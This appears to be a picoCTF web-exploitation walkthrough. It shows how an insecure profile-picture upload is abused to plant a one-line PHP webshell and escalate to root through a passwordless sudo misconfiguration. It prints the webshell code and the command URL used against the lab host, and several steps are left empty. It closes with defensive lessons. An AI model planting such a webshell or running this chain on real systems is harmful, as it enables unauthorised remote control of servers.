n0s4n1ty 1 PicoCTF Walkthrough

Web Exploitation

🔎 Initial Recon

The challenge gives us access to a web page that allows users to upload a profile picture. This is a classic entry point for file upload vulnerabilities. Here's what I did:

1. Navigated to the site and saw a form titled Upload Profile Picture.

2. Tried uploading a basic .jiff image to see what the server does with the file

✅ Observations:

The image is now uploaded to server andf the server accepts any file with any extension and saves it in a web-accessible folder, we might be able to upload and run a malicious script, such as a PHP webshell.

---

🐚 Step 1: Crafting the Web Shell

To test for Remote Code Execution (RCE), I created a simple PHP shell named shell.php with the following content:

<?php system($_GET['cmd']); ?>

📤 Step 2: Uploading the Shell

1. Uploaded shell.php via the profile picture form.

2. After upload, it appeared at:

3. 

   Lets try is it working or not

   

   BAmmm ! Out script is now working

🔐 Step 3: Privilege Escalation

The next step was to check what commands the www-data user could run with sudo. I ran:

http://standard-pizzas.picoctf.net:60582/uploads/shell.php?cmd=sudo -l

www-data user can run any command as root without providing a password. That’s a critical misconfiguration!

🧾Step 4: Reading the Flag

1. As it is given flag is in /root now lets gets its content using ls command

   

   2. Here is our flag.txt and now lets read it using cat

   3. 

      🎉🎉Here we got our flag

---

🧠 Lessons Learned

🔚 Conclusion

This challenge was a classic example of chaining two common vulnerabilities:

1. Insecure File Upload (RCE via webshell)

2. Privilege Escalation (via misconfigured sudo permissions)

It teaches the importance of:

• Validating file types and extensions

• Avoiding direct access to upload directories

• Using minimal privileges for web server users

• Strictly configuring sudo access